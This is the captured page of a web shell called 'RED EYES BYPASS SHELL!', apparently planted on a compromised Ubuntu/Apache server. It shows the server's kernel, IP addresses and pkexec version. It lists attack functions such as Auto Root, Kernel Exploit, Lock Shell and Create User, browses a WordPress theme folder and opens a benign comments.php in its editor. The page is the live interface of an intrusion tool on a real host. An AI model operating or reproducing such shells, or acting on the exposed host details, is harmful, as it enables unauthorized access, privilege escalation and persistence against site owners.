Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
envo-royal /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
assets
[ DIR ]
drwxr-xr-x
extra
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
1017
B
-rwxr-xr-x
archive.php
611
B
-rwxr-xr-x
comments.php
1.57
KB
-rwxr-xr-x
content-none.php
901
B
-rwxr-xr-x
content.php
500
B
-rwxr-xr-x
footer.php
184
B
-rwxr-xr-x
functions.php
13.89
KB
-rwxr-xr-x
header.php
471
B
-rwxr-xr-x
index.php
313
B
-rwxr-xr-x
page.php
707
B
-rwxr-xr-x
readme.txt
4.09
KB
-rwxr-xr-x
rtl.css
32.45
KB
-rwxr-xr-x
screenshot.png
183.68
KB
-rwxr-xr-x
search.php
715
B
-rwxr-xr-x
sidebar.php
188
B
-rwxr-xr-x
single-elementor_library.php
361
B
-rwxr-xr-x
single.php
918
B
-rwxr-xr-x
style.css
36.52
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /* * If the current post is protected by a password and * the visitor has not yet entered the password we will * return early without loading the comments. */ if ( post_password_required() ) { return; } if ( is_single() || is_page() ) : ?> <div id="comments" class="comments-template"> <?php if ( have_comments() ) : ?> <h4 id="comments"> <?php $comments_number = get_comments_number(); if ( '1' === $comments_number ) { /* translators: %s: post title */ printf( esc_html_x( 'One thought on “%s”', 'comments title', 'envo-royal' ), esc_html( get_the_title() ) ); } else { /* translators: 1: number of comments, 2: post title */ printf( esc_html( _nx( '%1$s thought on “%2$s”', '%1$s thoughts on “%2$s”', $comments_number, 'comments title', 'envo-royal' ) ), esc_html( number_format_i18n( $comments_number ) ), esc_html( get_the_title() ) ); } ?> </h4> <ul class="commentlist list-unstyled"> <?php wp_list_comments(); paginate_comments_links(); if ( is_singular() ) { wp_enqueue_script( 'comment-reply' ); } ?> </ul> <?php comment_form(); else : if ( comments_open() ) : comment_form(); endif; endif; // If comments are closed and there are comments, let's leave a little note, shall we? if ( !comments_open() && get_comments_number() && post_type_supports( get_post_type(), 'comments' ) ) : ?> <p class="no-comments"> <?php esc_html_e( 'Comments are closed.', 'envo-royal' ); ?> </p> <?php endif; ?> </div> <?php endif;
Close